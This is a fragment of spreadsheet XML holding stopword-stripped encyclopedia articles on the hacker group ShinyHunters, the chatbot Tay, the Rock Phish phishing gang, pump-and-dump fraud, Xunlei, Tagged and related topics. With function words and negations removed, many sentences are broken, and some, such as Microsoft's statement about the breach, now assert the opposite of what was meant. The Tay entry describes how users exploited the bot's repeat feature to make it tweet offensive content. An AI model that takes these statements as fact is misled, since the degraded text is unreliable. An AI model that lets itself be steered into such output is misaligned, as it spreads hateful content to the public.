protection act. rights management communications behalf rights management, rightscorp ruling jury trial december 2015 million. district judge liam o'grady, found failed "reasonably implement" method terminate repeated infringers digital millennium copyright act's "safe harbor" provision apply.in addition, lloyd's london took legal action remove liability obligations cox, based according filings, negligence disregard copyright infringement violations. total amount could liable for, lloyd's underwriting, estimated tens billions dollars. finances october 2013 company went public, trading otcqb ticker riht. 2014 company announced expanding canada europe investigating expansion europe. november 2014 rightscorp filed form 10-q securities exchange commission reporting 2014 earnings. company reported total loss $2.2 million first three quarters 2014 along total loss $6.5 million since 2011.in 2015, rightscorp loss $3.5 million first three months 2016 loss $784,000. security breach security issues rightscorp's online payment system surfaced october 2014. security gaps hidden form elements, secure sockets layer certificate, rightscorp permitting search engine indexing secure pages; names address alleged infringers publicly exposed including individuals settled cases warner bros miramax films. criticism issues raised regard rightscorp's practices. several court cases ruled digital millennium copyright (dmca) subpoenas require internet service providers (isps) identify users issuer subpoena; indeed, provide information face sanctions, issuer subpoena. notice sent rightscorp prevents lawsuit specific download notice; however, language notice, paying settlement admission guilt. although rightscorp unable infringement, press charges subsequent downloads, original settlement admission guilt previous infringement. comcast, largest internet provider united states, continually refused forward rightscorp's dmca settlement notices form rightscorp sends them. comcast removes threatening language settlement offer instead simply forwards letter customer basically reads incident report. references external links official website</t>
  </si>
  <si>
    <t>ShinyHunters</t>
  </si>
  <si>
    <t>shinyhunters criminal black-hat hacker group believed formed 2020 said involved numerous data breaches. stolen information often sold dark web. name alias twitter profile group maintains shiny pokémon profile picture, indicating name possibly derived game name. within game, players spend hours hunting rare shiny pokémon. this lend credence group's motivation: hunting shiny rare artefacts, them, user data. notable data breaches tokopedia: 2020 tokopedia breached shinyhunters, claimed data million user accounts, revealing users' gender, location, username, full name, email address, phone number, hashed passwords. wishbone: also 2020, shinyhunters leaked full user database wishbone, said contain personal information usernames, emails, phone numbers, city/state/country residence, hashed passwords. microsoft: 2020, shinyhunters also claimed stolen microsoft source code company's private github account. group published around data hacked github account hacking forum. some cybersecurity experts doubted claims analyzing code; upon analysis, shinyhunters' claims longer question. microsoft told wired magazine statement aware breach. microsoft later secured github account, confirmed shinyhunters reported unable access repositories. wattpad: july 2020, shinyhunters gained access wattpad database containing million user records. information leaked included usernames, real names, hashed passwords, email addresses, geographic location, gender, date birth. pluto november 2020, reported shinyhunters gained access personal data million pluto users. hacked data included users' display names, email addresses, addresses, hashed passwords dates birth. animal jam: also reported november 2020 shinyhunters behind hack animal jam, leading exposure million accounts. mashable: november 2020, shinyhunters leaked 5.22gb worth mashable database prominent hacker forum. pixlr: january 2021, shinyhunters leaked million user records pixlr. nitro pdf: january 2021, hacker claiming part shinyhunters leaked full database nitro contains million user records hacker forum free. bonobos: also january 2021 reported shinyhunters leaked full bonobos backup cloud database hacker forum. database said contain address, phone numbers, order details million customers; general account information another million registered customers; million partial credit card records hashed passwords. aditya birla fashion retail: december 2021, indian retailer aditya birla fashion retail breached ransomed. ransom demand allegedly rejected data containing 5.4m unique email addresses subsequently dumped publicly popular hacking forum next month. data contained extensive personal customer information including names, phone numbers, physical addresses, dobs, order histories passwords stored hashes other data breaches following hacks credited allegedly done shinyhunters. estimated impacts user records affected also given. lawsuits shinyhunters group investigation fbi, indonesian police, indian police tokopedia breach. tokopedia's founder also confirmed claim statement twitter.minted company reported group's hack federal enforcement authorities; investigation underway.administrative documents california reveal shinyhunters' hack mammoth media, creator wishbone, getting class-action lawsuit.animal stated preparing report shinyhunters cyber task force notify affected emails. they also created 'data breach alert' site answer questions related breach.bigbasket filed first information report (fir) november 2020, bengaluru police investigate incident.dave also initiated investigation group company's security breach. investigation ongoing company coordinating local enforcement fbi.wattpad stated reported incident enforcement engaged third-party security experts assist investigation. arrests 2022, sébastien raoult, french programmer suspected belonging group, arrested morocco awaiting extradition united states. references</t>
  </si>
  <si>
    <t>Publius (publishing system)</t>
  </si>
  <si>
    <t>publius attempted communication protocol developed lorrie cranor, rubin marc waldman give individuals ability publish information anonymously high guarantee publications would censored modified third party. experiment terminated sometime 2001 significant results. name system chosen reflect joint name authors federalist papers. design goals nine design goals publius development team were: censorship resistance: decreasing chance third party manage modify delete published materials. tamper evident: unauthorized changes traceable. source anonymous: tell published material available web. updatable: publishers allowed modify delete material. deniable: third parties participating publishing materials lacks responsibility hosted content. fault tolerant: system function even involved third parties faulty malicious. persistent: expiration date published materials. extensible: support future protocol extensions growth number publishers. freely available: software tools required system charge. technical details publius system consisted following agents: publishers participants publish content web. servers host publishers' content (considered part third parties). retrievers participants browse content published publishers.publius limited file sizes kilobytes. files publius could reference files, allowing users upload works larger kilobytes, file format allowed (e.g., upload html, pdf, postscript files referencing outside images fonts). publius system relied static list servers. when publisher wished piece content publius network, publisher first encrypted using random kilobyte symmetric key. this split parts minimum number shared parts required reconstruction content (see also secret sharing). reception system opened july 2000 two-month trial. system intended make censorship governments difficult spreading parts documents among multiple decentralized locations forerunner later file sharing systems. issues later systems copyright violations objectionable content also foreseen publius. ability system distribute communication content without allowing restriction identification original uploader called destabilizing.the system encrypts document divides fragments, keys, reside multiple randomly selected servers. though document split many keys, required reconstruct document information decrypted viewed. during trial period, publius project computers network, including servers center democracy technology xerox parc.the project updated since initial trial. references</t>
  </si>
  <si>
    <t>Royal Mint Gold</t>
  </si>
  <si>
    <t>royal mint gold digital gold currency cryptocurrency backed gold reserves royal mint. royal mint began testing blockchain transactions april 2017. first test transaction august 2017. rollout originally scheduled occur 2017. us-based group (chicago mercantile exchange) tentatively administer trading. time, daily telegraph said "appears somewhat similar exchange-traded fund securities physical gold".the project collapsed 2018, pulled royal mint hesitant find partner. implementation blockchain used prova open-source distributed ledger. proof-of-stake algorithm demonstrates ownership physical gold. bitgo provided blockchain code. backing gold royal mint stated "all gold held within highly secure storage facilities royal mint's vault royal mint acts solely sub-custodian claim gold" gold delivery would possible, additional fabrication fees amounts less london good delivery (400 worth us$400,000 january 2018). cancellation around october 2018, government cancelled mint's plans issue cryptocurrency, change management group pull left royal mint without trading venue. references further reading shelley goldberg (december 2017), blockchain could revolutionize commodity markets: technology already adopted gold trading, could extended sectors asset class., bloomberg lucas mearian (february 2018), "governments blockchain cryptocurrencies", computerworld external links official website</t>
  </si>
  <si>
    <t>Security</t>
  </si>
  <si>
    <t>security.txt proposed standard websites' security information meant allow security researchers easily report security vulnerabilities. standard prescribes text file called "security.txt" well known location, similar syntax robots.txt intended machine- human-readable, wishing contact website's owner security issues. security.txt files adopted google, github, linkedin, facebook. history internet draft first submitted edwin foudil september 2017. time covered four directives, "contact", "encryption", "disclosure" "acknowledgement". foudil expected directives based feedback. addition, security expert scott helme said seen positive feedback security community among million websites expected right now".in 2019, cybersecurity infrastructure security agency (cisa) published draft binding operational directive requires federal agencies publish security.txt file within days.the internet engineering steering group (iesg) issued last call security.txt december 2019 ended january 2020.a study 2021 found percent top-100 websites published security.txt file, percentage sites publishing file decreasing websites considered. study also noted number discrepancies standard content file. april 2022 security.txt file accepted internet engineering task force (ietf) 9116. file format security.txt files served /.well-known/ directory (i.e. /.well-known/security.txt) top-level directory (i.e. /security.txt) website. file must served https plaintext format. also ads.txt humans.txt robots.txt references external links official website</t>
  </si>
  <si>
    <t>Rock Phish</t>
  </si>
  <si>
    <t>rock phish refers phishing toolkit/technique group behind rock phish gang techniques time rock phish group stated behind "one-half phishing attacks carried out. verisign reports group romanian origin, others claimed group russian. they first identified 2004.their techniques sophisticated distinctive, outlined presentation apwg ecrime '07. history 2004 first rock phishing attacks contained folder path “/rock”, name attack, group. attackers employed wild card (domain name server) entries create addresses included target’s actual address sub-domain. example, case site appearing www.thebank.com.1.cn/thebank.html, ”thebank.com” portion domain name “wild card”, meaning presence purely superficial required order phishing page displayed. “1.cn” registered domain name, “/thebank.html” phishing page, combination “1.cn/thebank” display phishing page. this allows perpetrators make wild card portion legitimate domain name, appears first glance valid folder path. references</t>
  </si>
  <si>
    <t>Tay (bot)</t>
  </si>
  <si>
    <t>artificial intelligence chatter originally released microsoft corporation twitter march 2016; caused subsequent controversy began post inflammatory offensive tweets twitter account, causing microsoft shut service hours launch. according microsoft, caused trolls "attacked" service made replies based interactions people twitter. replaced background created microsoft's technology research bing divisions, named "tay" acronym "thinking you". although microsoft initially released details bot, sources mentioned similar based xiaoice, similar microsoft project china. technica reported that, since late 2014 xiaoice "more million conversations apparently without major incident". designed mimic language patterns 19-year-old american girl, learn interacting human users twitter. initial release released twitter march 2016 name taytweets handle @tayandyou. presented "the zero chill". started replying twitter users, also able caption photos provided form internet memes. technica reported experiencing topic "blacklisting": interactions regarding "certain topics eric garner (killed york police 2014) generate safe, canned answers".some users twitter began tweeting politically incorrect phrases, teaching inflammatory messages revolving around common themes internet, "redpilling" "gamergate". result, robot began releasing racist sexually-charged messages response twitter users. artificial intelligence researcher roman yampolskiy commented tay's misbehavior understandable mimicking deliberately offensive behavior twitter users, microsoft given understanding inappropriate behavior. compared issue ibm's watson, begun profanity reading entries website urban dictionary. many tay's inflammatory tweets simple exploitation tay's "repeat capability. publicly known whether "repeat capability built-in feature, whether learned response otherwise example complex behavior. inflammatory responses involved "repeat capability; example, responded question "did holocaust happen?" made up". suspension soon, microsoft began deleting tay's inflammatory tweets. abby ohlheiser washington post theorized tay's research team, including editorial staff, started influence edit tay's tweets point day, pointing examples almost identical replies tay, asserting "gamer gate sux. genders equal treated fairly." from evidence, gizmodo concurred "seems hard-wired reject gamer gate". "#justicefortay" campaign protested alleged editing tay's tweets.within hours release tweeted 96,000 times, microsoft suspended twitter account adjustments, saying suffered "coordinated attack subset people" "exploited vulnerability tay."madhumita murgia telegraph called public relations disaster", suggested microsoft's strategy would label debacle well-meaning experiment gone wrong, ignite debate hatefulness twitter users." however, murgia described bigger issue "artificial intelligence worst beginning".on march microsoft confirmed taken offline. microsoft released apology official blog controversial tweets posted tay. microsoft "deeply sorry unintended offensive hurtful tweets tay", would "look bring back confident better anticipate malicious intent conflicts principles values". second release shutdown march 2016, microsoft accidentally re-released twitter testing able tweet again, released drug-related tweets, including "kush! [i'm smoking kush infront police] "puff puff pass?" however, account soon became stuck repetitive loop tweeting "you fast, please take rest", several times second. because tweets mentioned username process, appeared feeds 200,000+ twitter followers, causing annoyance some. quickly taken offline again, addition tay's twitter account made private followers must accepted interact tay. response, microsoft said inadvertently online testing.a hours incident, microsoft software developers announced vision "conversation platform" using various bots programs, perhaps motivated reputation damage done tay. microsoft stated intend re-release "once make safe" made public efforts legacy december 2016, microsoft released tay's successor, chatterbot named satya nadella, microsoft, said "has great influence microsoft approaching ai," taught company importance taking accountability.in july 2019, microsoft cybersecurity field diana kelley spoke company followed tay's failings: "learning really important part actually expanding team's knowledge base, they're also getting diversity learning". also xiaoice chinese equivalent research laboratory references external links official website. archived 2016 twitter</t>
  </si>
  <si>
    <t>Xunlei</t>
  </si>
  <si>
    <t>xunlei limited (chinese: pinyin: xùnléi; jyutping: seon3 leoi4; lit. 'thunderbolt') chinese multinational technology company online service provider founded 2003. subsidiary xunlei limited, shenzhen xunlei networking technologies, co., ltd. (chinese: 迅雷网络技术有限公司) formerly known sandai technologies (shenzhen) inc. changed name shenzhen xunlei networking technologies, co., ltd. 2005. headquarters nanshan district, shenzhen.in april 2014, xunlei received investment chinese electronics company xiaomi $200 million. june 2014, went public nasdaq stock exchange, selling 7.315 million american depositary shares (ads) raising million. according annual ranking china's internet companies released ministry industry information technology chinese government, xunlei occupied 42nd place 2017's ranking.the main products developed xunlei limited xunlei download manager peer-to-peer software, supporting http, ftp, edonkey, bittorrent protocols. 2010, commonly used bittorrent client world. october 2017, company announced transform blockchain company, release blockchain-based product named onething cloud. onething cloud users linktoken type virtual token) contributing bandwidth xunlei's content delivery network.xunlei ltd. announced board directors appointed chen, former tencent cloud computing unit leader, chief executive officer company director board june 2017. december 2017, xunlei announced board directors company elected chuan wang chairman board directors company. wang director xunlei since march 2014. wang co-founder xiaomi inc., served vice president since 2012. also founder beijing duokan technology co., ltd., served chief executive officer since inception business 2010. products xunlei download manager, generally called xunlei, flagship product xunlei corporation desktop software. xunlei popular download software china. since 2017, stellarcloud, onething cloud thunderchain become important products corporation. xunlei through xunlei, users access large portion files available internet. xunlei uses technology called p2sp speed download. features xunlei includes built-in browser, changeable skins, cloud storage, "offline" downloading, hi-speed downloading (only available members), email service more. according iresearch's report, march 2014, cloud accelerates monthly active users xunlei reach million(including approximately million paid member), market share 81.4% cloud accelerated products services market china.xunlei accompanied family products including xunlei xunlei, xunlei edition, xunlei express edition. adware, xunlei products feature banner advertisements, disabled logged user. nebula nebula (chinese: lit. 'asteroid field') content delivery/distribution network (cdn) product launched shenzhen onething technologies co., ltd, wholly owned subsidiary xunlei, june 2015. different traditional cdn, nebula make idle bandwidth share users. order participate plan, users network device (zhuanqianbao onething cloud) xunlei. return, xunlei gives user virtual token reward. civil broadband prices broadband prices enterprises china, nebula cdn's enterprise-side prices lower competitors. business customers nebula include xiaomi, iqiyi, momo, insta360, bilibili xunlei itself. august 2017, xunlei announced received official license operating ministry industry information industry china. stellarcloud stellarcloud (chinese: 星域云) shared cloud computing platform expands xunlei's existing content delivery network (cdn) services infrastructure service (iaas), offering edge computing, function computing shared (scdn) solutions. stellarcloud created help companies transition cloud, including content delivery, live streaming, data storage artificial intelligence (ai). supported million computing nodes, stellarcloud offer much bandwidth capacity 1500 storage capacity. onething cloud onethingcloud (chinese: 玩客云), private cloud designed people pursue high quality digital entertainment, provides people quick download, instant storage removing, file management, remote control, multimedia entertainment functions. thunderchain april 2018, xunlei launched thunderchain (chinese: 迅雷链), high-performance blockchain platform, concurrently conduct millions transactions second (tps). based xunlei's proprietary homogeneous multichain framework, thunderchain designed realize confirmation interaction among homogeneous chains enable multiple transactions executed different chains parallel. optimized practical byzantine fault tolerance (pbft) adopted thunderchain consensus model results latency makes possible generate block second. pbft, consistency algorithm, also able avoid soft fork. thunderchain supports smart contracts written solidity language compatible ethereum virtual machine (evm), making easy migrate applications blockchain platforms. thunderchain file system thunderchain file system (tcfs), based xunlei's proprietary distributed technology millions shared computing nodes, distributed file system data storage authorized distribution. built specifically blockchain platforms including thunderchain platforms. blockchain developers enterprises build decentralized applications (dapps) distributed data storage integration, possessing improved capabilities openness, transparency, non-temper ability, traceability, reliability, security encryption, mass storage authorization. xunlei kankan xunlei kankan, also known kankan, video-on-demand service interface well client application. xunlei kankan also available mobile platforms including android (including iphone kankan ipad). 2015, xunlei sold entire stake xunlei kankan beijing nesound international media corp., ltd. total consideration million. others addition products, company also produces software media player, game accelerator, live streaming video platform online games. facilities headquarters offices xunlei building, headquarters building xunlei, construction expected completed 2020. xunlei building located shenzhen nanshan district, adjacent shenzhen metro line line building floors, total construction area building 65,000 square meters. concerns criticisms linktoken linktoken, formerly known onecoin, kind virtual token issued xunlei, token must obtained sharing user's network bandwidth, storage space resources. xunlei said token used network acceleration services, cloud storage services internet content. company explained digital token would allow transparent bookkeeping computing resources users share company's cloud platform. account prohibition virtual currency trading initial coin offering (ico) china, xunlei declare linktoken constitute cannot purchased traded cash, company issued lawyer's letters third-party trading platforms, requiring stop linktoken trading activities. nevertheless, trading price token still rose times month unofficial trading platforms, critics assert token speculative face regulatory risks.on september 2018, xunlei entered strategic partnership newland hi-tech group co., ltd. connection strategic partnership, xunlei also entered series transactions beijing linkchain co., ltd., associated company newland, transfer exclusive right operate linktoken program within mainland china, including without limitation, formulation, amendment execution rules governing rewarding linktoken users, linktoken pocket linktoken mall, related assets liabilities beijing linkchain (the “transfer”). upon completion transfer, xunlei cease operating linktoken program within mainland china. this transfer allow xunlei focus research development underlying blockchain technology infrastructure, thunderchain thunderchain file system (tcfs). file sharing xunlei different tools support active file sharing. while copyright advocates view xunlei tool facilitates copyright violation, advocates criticize xunlei leech much downloading uploading. also often observed xunlei prioritizes file sharing xunlei users rather client users. many pure tools blocked xunlei, although trend weakened xunlei began balancing number downloads uploads. xunlei sets storage servers backup files active shared longer. this feature named high-speed channel allows xunlei users retrieve data faster others. purchased users rights access servers download files. also tencent flashget, another download manager references external links english version thunder mini baidu's most searched software list malware win32/kankan</t>
  </si>
  <si>
    <t>Pump and dump</t>
  </si>
  <si>
    <t>pump dump (p&amp;d) form securities fraud involves artificially inflating price owned stock false misleading positive statements, order sell cheaply purchased stock higher price. once operators scheme "dump" (sell) overvalued shares, price falls investors lose money. this common small cryptocurrencies small corporations/companies, i.e. "microcaps".while fraudsters past relied cold calls, internet offers cheaper easier reaching large numbers potential investors spam email, investment research websites, social media, misinformation. scenarios pump dump schemes take place internet using email spam campaign, media channels fake press release, telemarketing "boiler room" brokerage houses (such dramatized 2000 film boiler room). often stock promoter claim "inside" information impending news. newsletters purport offer unbiased recommendations, tout company "hot" stock, benefit. promoters also post messages online chat groups internet forums, urging readers stock quickly.if promoter's campaign "pump" stock successful, entice unwitting investors purchase shares target company. increased demand, price, trading volume stock convince people believe hype, shares well. when promoters behind scheme sell (dump) shares stop promoting stock, price plummets, investors left holding stock worth significantly less paid fraudsters frequently ploy small, thinly traded companies—known "penny stocks", generally traded over-the-counter united states, would mean markets bulletin board pink sheets), rather markets york stock exchange (nyse) nasdaq—because easier manipulate stock little independent information available company. principle applies united kingdom, target companies typically small companies ofex. modern spin attack known hack, pump dump. form, person purchases penny stocks uses compromised brokerage accounts purchase large quantities stock. result price increase, often pushed traders seeing quick advance stock. original stockholder cashes premium. pump dump schemes also permeate crypto-market, targeting especially market-cap, illiquid coins cryptocurrency exchanges. examples stratton oakmont early 1990s penny-stock brokerage stratton oakmont artificially inflated price owned stock false misleading positive statements, order sell cheaply purchased stock higher price. firm co-founder jordan belfort criminally convicted role scheme. later turned story memoir, wolf wall street, later adapted academy award-nominated film name. jonathan lebed during dot-com bubble, stock-market fever height many people spent significant amounts time stock internet message boards, 15-year-old named jonathan lebed allegedly used internet successful pump dump. lebed bought penny stocks promoted message boards, pointing price increase. allegedly, investors bought stock, lebed sold profit, leaving investors holding bag. came attention u.s. securities exchange commission (sec), filed civil suit alleging security manipulation. lebed settled charges paying fraction total gains. neither admitted denied wrongdoing, promised manipulate securities future. enron late april 2001, enron collapse, executives large energy company enron participated elaborate scheme pump dump, addition illegal practices fooled even experienced analysts wall street. studies anonymous messages posted yahoo board dedicated enron revealed predictive messages company akin house cards, investors bail stock good. after enron falsely reported profits inflated stock price, covered real numbers using questionable accounting practices. twenty-nine enron executives sold overvalued stock billion dollars company went bankrupt. park financial group international media solutions, park financial group, spear jackson, international media solutions, involved pump dump price share increased $14.00 100,000 shares traded day, netting spear jackson around million profits. 2005 spear jackson international media solutions fined million, including executive officers, kermit silva yolanda velazquez, paying additional $420,000 personal accounts. december 2007, park company's president ordered $113,000 fines penalties. langbar international started crown corporation, langbar international biggest pump dump fraud alternative investment market, part london stock exchange. company point valued greater billion, based supposed bank deposits brazil exist. none chief conspirators convicted, although whereabouts known. patsy made negligent false statement assets convicted banned director. investors lost much £100 million sued fraudsters recovered million. morrie tobin april 2018, morrie tobin others, using offshore accounts, gained $165 million pump dump scheme. when questioned federal agents, tobin told agents involved another scheme implicating soccer coach yale university, turn 2019 college admissions bribery scandal. february 2019, tobin pled guilty conspiracy securities fraud. june 2019, federal judge tobin million forfeiture. cryptocurrency being unregulated market, concentration large amount cryptocurrency small number hands, price sensitive pump dump schemes. there organised pump dump schemes social media platforms including telegram discord. scam pump dump stock scams prevalent spam, accounting spam e-mail messages. survey 75,000 unsolicited emails sent january 2004 july 2005 concluded spammers could make average return 4.29% using method, recipients spam message typically lose close 5.5% investment within days. study böhme holz shows similar effect. stocks targeted spam almost always penny stocks, selling less share, traded major exchanges, thinly traded, difficult impossible sell short. spammers acquire stock sending messages, sell message sent. comparison types schemes pump dump scam type economic bubble, main difference scheme types bubbles pump dump bubble deliberately perpetrated unlawful activity. pump dump scheme similar many ways ponzi scheme types scam misrepresentations effort enrich promoters and/or initial investors money later investors), however, number differences schemes: ponzi-type investments privately traded, often individuals known another, whereas pump dump schemes typically marketed general public traded public stock exchanges victims perpetrators acquainted other. ponzi schemes typically promise specific returns investments and/or include falsified records implying consistent steady returns, whereas pump dump schemes come general and/or implied promises substantial profits. ponzi schemes typically come expectation profit relatively-extended period time typically last months, years even decades inevitable collapse. comparison, pump dump scams designed make profits extremely quickly executed period weeks, days even hours. ponzi schemes occasionally result investment vehicles originally intended legitimate ultimately fail perform expected. comparison, pump dump schemes invariably intended scams conception, although fairly common tactic employed pump dump schemers take once-legitimate business (one either failing defunct), even name, order pump dump stock. reasons, ponzi schemes tend leave extensive trail evidence. they typically much easier prosecute discovered, often result much stiffer criminal penalties.pump dump differs many forms spam (such advance fraud emails lottery scam messages) require recipient contact spammer collect supposed "winnings", transfer money supposed bank accounts. this makes tracking source pump dump spam difficult, also given rise "minimalist" spam consisting small untraceable image file containing picture stock symbol. scalping social media variation pump dump scam known "scalping." scalping scheme, stock promoter takes position stock touts stock without disclosing intent sell stock. recommending stock (often, always, providing inflated price targets generic promises substantial returns), promoter convinces others purchase stock, providing temporary rise share price volume allows "scalper" sell shares unsuspecting investors obtain profit. scalping scams frequently effectuated social media (e.g., twitter), lead criminal civil liability united states. like pump dump schemes, scalping scams frequently target microcap stocks volume allows relatively small purchase volumes cause significant spikes share price. given rise social media, scalping scams become significant focus regulators united states recent years. short distort another variant pump dump scam, "short distort" works opposite manner. instead first buying stock, artificially raising price selling, "short distort" scammer first short-sells stock, artificially lowers price, using techniques pump dump using criticism negative predictions regarding stock. scammer covers short position back stock lower price. regulation method regulating restricting pump dump manipulators target category stocks often associated scheme. end, penny stocks target heightened enforcement efforts. united states, regulators defined penny stock security must meet number specific standards. criteria include price, market capitalization, minimum shareholder equity. securities traded national stock exchange, regardless price, exempt regulatory designation penny stock, since thought exchange traded securities less vulnerable manipulation. therefore, citigroup (nyse:c) nyse listed securities traded $1.00 market downturn 2008–2009, properly regarded "low priced" securities, technically "penny stocks". although penny stock trading united states primarily controlled rules regulations enforced securities exchange commission financial industry regulatory authority (finra), genesis control found state securities law. state georgia first state codify comprehensive penny stock securities law. secretary state cleland, whose office enforced state securities laws, principal proponent legislation. representative chesley morton, stockbroker georgia general assembly time, principal sponsor bill georgia house representatives. georgia's penny stock subsequently challenged court. however, eventually upheld u.s. district court, statute became template laws enacted states. shortly thereafter, finra enacted comprehensive revisions penny stock regulations. these regulations proved effective either shuttering greatly restricting broker/dealers, blinder, robinson company, specialized penny stocks sector. meyer blinder jailed securities fraud 1992, collapse firm. however, sanctions specific regulations lack effective means address pump dump schemes perpetrated unregistered groups individuals. references further reading krinklebine, karlos (2009). hacking wall street: attacks countermeasures. darkwave press. 402. isbn 978-1-4414-6363-0. tillman, robert indergaard, michael (2005). pump dump: rancid rules economy. isbn 0-8135-3680-4. sergey perminov, trendocracy stock market manipulations 2008, isbn 978-1-4357-5244-3. external links pump dump stock schemes 2005 pump dump stock schemes 2001 movie boiler room, fictional account pump dump company</t>
  </si>
  <si>
    <t>Tagged (website)</t>
  </si>
  <si>
    <t>tagged social discovery website based francisco, california, founded 2004. allows members browse profiles members, share tags virtual gifts. tagged claims million members 2014. september 2011, quantcast estimates tagged monthly unique users million united states, 18.6 million globally. michael arrington wrote april 2011 tagged notable ability grow profitably facebook.in 2009, tagged criticized sending deceptive bulk email paid $1.4 million legal settlements regarding practices. company since adopted privacy reforms changed invitation processes.owned ifwe, inc., inc. company ranking #476 2010 inc. list fastest-growing independent u.s. private companies forbes' 2011 list america's most promising companies.on april 2017, company acquired meet group. history tagged inc. co-founded mid-2004 entrepreneurs greg tseng johann schleier-smith, wanted build "teen yahoo! next mtv". pair formerly co-founded internet incubator jumpstart technologies, later fined $900,000 alleged violations can-spam act, largest-ever penalty spam.in september 2005 company raised $1.5 million angel investor funding three months later raised additional million mayfield fund, venture capital firm.originally under-18 site, tagged allowed users join october 2006.in march 2008, microsoft announced commercial partnership social networking sites tagged, facebook, linkedin, bebo, regarding email contacts apis, since implemented. other past current tagged partnerships included slide, rockyou, photobucket, meebo, razz, jangl. february 2009, following complaints public tagged blocked qatar isp, qtel, inappropriate content qtel could selectively filter. tagged.com visited sites qatar.in january 2010, tagged announced donating $50,000 yéle haiti earthquake fund, partly stemming user donations. month, tagged $200,000 judgment erik voegler, spamming tagged users.in october 2010, tagged ranked #100 deloitte's list fastest growing technology, media, telecommunications, life sciences clean technology companies north america.in april 2011, tagged acquired digsby, multi-protocol instant messenger social network notification client windows million registered users.as october 2011, tagged employees, increase employees beginning 2011. greg tseng continues interview employees, cater lunch dinner, hold office-wide meetings every friday. tagged member social media advertising consortium, trade industry association aims increase advertising revenue facilitate collaboration among social networking sites, advertisers, marketing researchers.in september 2011, tagged made second acquisition, gaming application wegame.in november 2011, tagged named forbes list "america's most promising companies".in december 2011, tagged acquired networks inc., third-largest social network behind facebook myspace. deal, whose terms disclosed, added hi5's million members tagged's base million registered users.also december 2011, tagged acquired topicmarks, natural language processing machine learning company. deceptive bulk email june 2009, time magazine columnist sean gregory called tagged "the world's annoying website". tagged asked users email username password, retrieved email addresses address books, repeatedly sent email invitations people registered tagged, falsely stating "added friend" inviter sent photos tagged. this process labelled "e-mail scam" consumer anti-fraud advocates drawn criticism technology press users. emails discussed possible spam black resemblance virus noted snopes.com. york times referred practice "contact scraping".in july 2009 york state attorney general andrew cuomo announced intention tagged "deceptive email marketing invasion privacy". tagged reached settlement agreed $500,000 modify promotional practices. simultaneously, tagged settled enforcement action state texas, agreeing $250,000 penalties fees. conditions settlement included "clear conspicuous" disclosure information user's email address book, providing clear method skip step display users specific emails sent. tagged adopted reforms changed invitation processes.in february 2010, tagged settled class action lawsuit former registration process california residents miriam slater sara golden awarded $10,000 each. tagged also agreed destroy email addresses collected users april june 2009, users mean invite contacts site.in april 2010, francisco district attorney kamala harris announced tagged agreed $650,000 settle claims deceptive emails. this settlement related emails sent april 2009 june 2009. aborted ipo, shift focus october 2014, tagged aborted plans perform initial public offering, citing decreased revenue proliferation mobile devices. october 2014, tagged performed number changes corporate level, including acquiring social messaging startup tinode naming co-founders, dash gopinath gene sokolov, positions chief product officer senior vice president engineering, respectively. tagged also announced parent company would re-named ifwe, inc. (stylized if(we), company overall would focus becoming incubator mobile software, although continue tagged hi5. website after registering free account, tagged users customize profile page, post biography interests, post status updates, upload photos, send receive messages. there also option upgrade membership monthly fee, allows users users recently viewed profile, among additional features. they also sort videos viewed, rated, liked, send virtual gifts friends. virtual gifts bought "gold" users actual money receive completing special offers tasks. there chat rooms users engage real time online chat according mood. designed facilitate relationships dating, tagged allows users send receive notifications "luv", "winks", "meet me", rating engine allows users rate attractiveness photos submitted others. october 2009, tagged announced simpler signup process. mobile versions tagged developed mobile version site april 2011, making tagged usable smartphones mobile internet browser. this version allows users send receive friend requests, play games, send messages. this mobile version also offers location-based, real-time chat users. tagged began offering iphone application july 2010, downloaded 100,000 times first week. tagged's android application became available march 2011. april 2011, android versions, slightly users iphone application, 2011 number three social networking application android. latest update android apps, tagged added capability refreshing data using "pulling down" gesture loading data using "pulling gesture. june 2011 tagged launched first blackberry application. being native application, runs mixture html device systems. social games social games tagged differ social networking services, players encouraged make friends games. 2010, tagged opened in-house gaming division. leading division andrew pedersen, former vice president pogo division electronic arts. tagged plans create social games, several already development. together acquisition digsby, tagged's focus social games signals attempt social communication options platform.launched 2008, pets tagged's first game and, 2011, remains popular. similar fantasy sports league, players virtual money "buy" others like pets, barter players sell price. virtual cash earned players several ways, frequently logging tagged, converting tagged gold pets cash pets cash using real money. farm introduced 2011. unlike zynga's farmville facebook, animation farmer. advancement based virtual money earned harvesting plants animals game. other past games tagged included zynga games mafia wars poker crowdstar's happy aquarium. child safety initially targeting u.s. teens, tagged opened users worldwide aged older october 2006 still maintains security measures users users public cannot view profiles 14-year-olds, profiles 16-year-olds private public users teens friends knowing email address surnames request friendship, younger user must accept friendship request. however, security measures entirely successful. february 2009, high-school teacher arrested 14-year-old girl tagged. 32-year-old teacher, listed either state national offender websites, female friends 17.in december 2009 york state attorney general andrew cuomo announced tagged social networking sites agreed remove registered offenders york electronic securing targeting online predators act. nevertheless, 2010 undercover investigation cuomo's office claimed graphic images children sexually abused readily accessible tagged. investigators registered accounts tagged reported inappropriate content tagged administrators following procedures described site. they found "significant lapses" tagged's response reports. news conference, cuomo referred tagged "one worst social networking sites we've encountered".as february 2014, users must least years account tagged. user demographics site traffic april 2011, alexa rankings suggest popularity tagged peaked early 2009 declining since. each month tagged visited million american users 18.6 million users worldwide. hitwise data shows december 2008 december 2009 facebook drove category growth, site grow market share period tagged, increased share 35%. september 2009, tagged 2.38% share social networking site market united states based monthly visits.though originally teen-only site, tagged members 49-year-old group other; 2011, teens united states accounted members. sixty-four percent users earn $60,000 year less college education. united states, users tagged likely internet users general female african american.eighty percent tagged users also facebook. according comscore december 2009 data, users spent minutes longer average tagged facebook users facebook.in 2010, comscore reported tagged entered u.s. online display publishers first time. tagged.com ranked number 0.6% share total market, served billion united states first quarter 2010.in september 2010, tagged surpassed million registered members, quarter third active monthly. revenue grew million, 2011 revenue predicted tseng million. references external links official website</t>
  </si>
  <si>
    <t>Time-based currency</t>
  </si>
  <si>
